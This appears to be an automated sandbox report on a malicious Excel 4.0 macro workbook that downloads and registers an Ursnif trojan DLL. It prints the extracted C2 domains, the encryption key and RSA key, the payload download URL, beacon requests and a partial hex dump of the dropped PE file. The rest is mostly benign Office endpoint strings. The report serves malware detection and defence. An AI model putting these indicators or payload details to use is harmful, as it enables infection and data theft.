Analysis Report 4Y2I7k0.xlsb

Overview

General Information

Sample Name:	4Y2I7k0.xlsb
Analysis ID:	402998
MD5:	6798cc178ee3d27d23bdfb81c44f404f
SHA1:	d52cf93a65288e388782e3dcf982a765998e89f7
SHA256:	92728e6532d7288ef1223a443bd6ad01faf0815258d1d1d513d4bf9111fcc306
Tags:	docusign
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Ursnif

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Office process drops PE file

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the installation date of Windows

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 4.2.regsvr32.exe.46194a0.2.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

4_2_00BB35A1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

4_2_00BB4E9C

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\block.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: presentation[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 15:11:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 03 May 2021 13:17:32 GMTAccept-Ranges: bytesContent-Length: 312832Cache-Control: max-age=10800Expires: Mon, 03 May 2021 18:11:39 GMThost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /presentation.dll HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docs.atu.ngr.mybluehost.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /9v0yu2jY7xyV/b1FQO4_2Bpu/oU2ibFtGutNT_2/BDybIHlLn_2F8TpFqr5X2/irpDvuA9ssjgofrd/4c1VwA_2BbPhSHP/JtDxx0HIWF7ccpVHCr/rPkDzPGSc/uYSPUi7ev1DnwMAe5KYZ/Gp3xLJmh6ETG_2FBMkN/E7fPvyWq8VbZApgZDb6Zoc/Q_2B5FFdwDlGz/OOPdEgA5/KuZ03TAeWnQ8TuTYrWBzpCh/HZ9XO4QjjW/CqnmDoK9QRlDYSYvJ/FQtGoFVns4yC/u0kF3ZfH7vX/MHfLituxTdH5hS/1UdaGiPbq9uDEicbTdsew/7sN4X HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6pQ2A_2F2B3uIfC5gf/_2FhwtDCH/73_2BQ_2BuzT9wYw8ZBA/CtDYBpMjmIzd4NANr9h/E_2BV0SsS_2FE5aeMX1xgh/NZq_2FWoEox0m/1PODYUaT/NQ2cpVElyM7Xu6KIKpsyFvG/B_2BqGxJnN/2dJtt0U587Lg0hYu1/sn5rm17uvS_2/FSnbx1glCyi/Dccdos_2B6Zr6y/J66yl83piVRuKEegL7hvJ/wSN_2FkghPvIWS2b/dNNXKyb_2FwEpQo/6heBhUKqFR_2BfxaOL/CWnJM0msX/t7S7YE6CyJwVuKH5zkij/QhpyHfh3tCqTr5UZqei/wkeRPNzr/SJP HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2NycgEUCU9aFB9EW/oYWq0ZxfG4Rwlla/DVHHJKmiaah_2Fc00M/sq13SA7xg/8iyktPbgAp05En4Ey1CY/kqZ7yrPVavEfwrp_2Bj/lR9RWtjlXq0cRNIy_2F60o/lSzY3HE8sRHUM/Gmj_2FCn/uIce1p1HXF5VL_2B2XdUoWC/0FWxUtGgoe/_2FtabDk_2Fjn_2B4/RA9Czz9AhUGX/udDMzbuC4Rg/qCC85CWCCm4L8G/K_2BwcLiGvh5lIZwjZ_2F/b5OeSUXGe4Di3gUA/5zgIzjMm4PmTEiN/WPUcUTj_2FhdF2kJij/C0SngaUJJ/pSANnjSkZUqo1FAOuoqb/ZSUlY4pVLEH/22gzP HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eZG8I16LYY6RQIy/fhCGljC_2FGvNP1fHp/pp7vitMvb/J_2BJIUyGHNqNDnXVsuN/Dv3DXf5iFChU433fFbO/cDNqIWEud5hIofjPLbzDiL/mvTJAEZe_2B8n/HOY_2BNn/Mwl4PuZbr98bXlg5umHHmqo/MfccYXgKbn/EB6DVkj22BI8iPLRL/0BMvppaqZnA1/ltGjCcB3Qq_/2Bf9hop2VhIWRy/FnUIqjkgdHWzn_2FvGT_2/BBOAGxHvl0zgZKxj/wWDgg8kJ81PEW_2/BxYtpnd1YZW_2FsGmO/XTHEj72q_/2Fq_2BcpSuAkpIBrcz7B/nlLQMY665CUBQPVFj3V/qV9UsTYut/AnDN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3LFHxcULedfl6vRi2f/7DW3Lbewx/BQzXQE1l6ur2AvUmdOWD/bKkgWqKpyiEbwfjQpgM/vQH_2F_2FVT4APkhQHeL5r/UitKKqshWwy_2/BGH0L4a6/pkZlxCCLsptJgcoJr9UTHwd/Ffy1B0L9r9/Eyyxrmwquwor3qSMh/TBe5k3Obt68k/mJNCVkgWk8D/7yx9L1_2BxLGbp/uEopOUEa1UaIA_2FbaBzA/DPd4NXI0Z4aaUIY_/2BCwd5luDmdcULL/gWZXR8amBs_2Bdba4m/y_2FNHAH5/8r0gOR08HJF6YSW4fPnv/pO6q_2Bxl8Zmi6rf2mr/5MzgQcGiWowQQeHDILIXCa/Ln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:86.0) Gecko/20100101 Firefox/86.0Host: chat.veminiare.com

Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3812dc88,0x01d7407a</date><accdate>0x3812dc88,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3812dc88,0x01d7407a</date><accdate>0x3812dc88,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x3817a180,0x01d7407a</date><accdate>0x3817a180,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x3817a180,0x01d7407a</date><accdate>0x3817a180,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x381a0388,0x01d7407a</date><accdate>0x381a0388,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x381a0388,0x01d7407a</date><accdate>0x381a0388,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: docs.atu.ngr.mybluehost.me

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 03 May 2021 15:12:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: {61E1F67C-AC6D-11EB-90E5-ECF4BB2D2496}.dat.15.dr	String found in binary or memory: http://app.buboleinov.com/9v0yu2jY7xyV/b1FQO4_2Bpu/oU2ibFtGutNT_2/BDybIHlLn_2F8TpFqr5X2/irpDvuA9ssjg
Source: {9B5A9DDA-AC6D-11EB-90E5-ECF4BB2D2496}.dat.34.dr, ~DF0F9DAFE54CC87186.TMP.34.dr	String found in binary or memory: http://app.buboleinov.com/eZG8I16LYY6RQIy/fhCGljC_2FGvNP1fHp/pp7vitMvb/J_2BJIUyGHNqNDnXVsuN/Dv3DXf5i
Source: {8D1871FD-AC6D-11EB-90E5-ECF4BB2D2496}.dat.32.dr, ~DFF7BA5DE226E46A61.TMP.32.dr	String found in binary or memory: http://app3.maintorna.com/2NycgEUCU9aFB9EW/oYWq0ZxfG4Rwlla/DVHHJKmiaah_2Fc00M/sq13SA7xg/8iyktPbgAp05
Source: {7CFE4BA2-AC6D-11EB-90E5-ECF4BB2D2496}.dat.27.dr, ~DF6C0FD439615FE33F.TMP.27.dr	String found in binary or memory: http://chat.billionady.com/6pQ2A_2F2B3uIfC5gf/_2FhwtDCH/73_2BQ_2BuzT9wYw8ZBA/CtDYBpMjmIzd4NANr9h/E_2
Source: sharedStrings.bin	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dll
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.15.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr	String found in binary or memory: http://www.youtube.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.office.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.onedrive.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://augloop.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.entity.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cortana.ai/api
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cr.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://directory.services.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.windows.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://graph.windows.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
